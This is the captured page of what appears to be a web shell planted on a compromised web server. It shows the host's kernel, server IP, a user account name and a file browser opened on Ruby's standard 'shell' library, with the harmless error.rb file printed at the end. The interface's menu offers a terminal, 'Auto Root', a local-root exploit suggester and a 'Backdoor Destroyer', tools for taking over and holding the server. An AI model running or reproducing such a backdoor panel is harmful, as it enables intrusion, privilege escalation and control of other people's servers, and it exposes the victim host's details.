Linux 43-250-141-107.cprapid.com 4.18.0-553.150.1.lve.el8.x86_64 #1 SMP Tue Aug 4 17:30:48 UTC 2026 x86_64
LiteSpeed
Server IP : 43.250.141.107 & Your IP : 216.73.217.65
Domains :
Cant Read [ /etc/named.conf ]
User : thepngre
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
shell /
Delete
Unzip
Name
Size
Permission
Date
Action
builtin-command.rb
2.4
KB
-rw-r--r--
2014-08-22 13:32
command-processor.rb
18.54
KB
-rw-r--r--
2014-08-22 13:32
error.rb
573
B
-rw-r--r--
2011-05-19 10:07
filter.rb
2.56
KB
-rw-r--r--
2013-12-15 13:09
process-controller.rb
7.46
KB
-rw-r--r--
2014-08-26 12:44
system-command.rb
3.56
KB
-rw-r--r--
2014-07-27 03:44
version.rb
255
B
-rw-r--r--
2012-12-05 13:55
Save
Rename
# # shell/error.rb - # $Release Version: 0.7 $ # $Revision: 31641 $ # by Keiju ISHITSUKA(keiju@ruby-lang.org) # # -- # # # require "e2mmap" class Shell module Error extend Exception2MessageMapper def_e2message TypeError, "wrong argument type %s (expected %s)" def_exception :DirStackEmpty, "Directory stack empty." def_exception :CantDefine, "Can't define method(%s, %s)." def_exception :CantApplyMethod, "This method(%s) does not apply to this type(%s)." def_exception :CommandNotFound, "Command not found(%s)." end end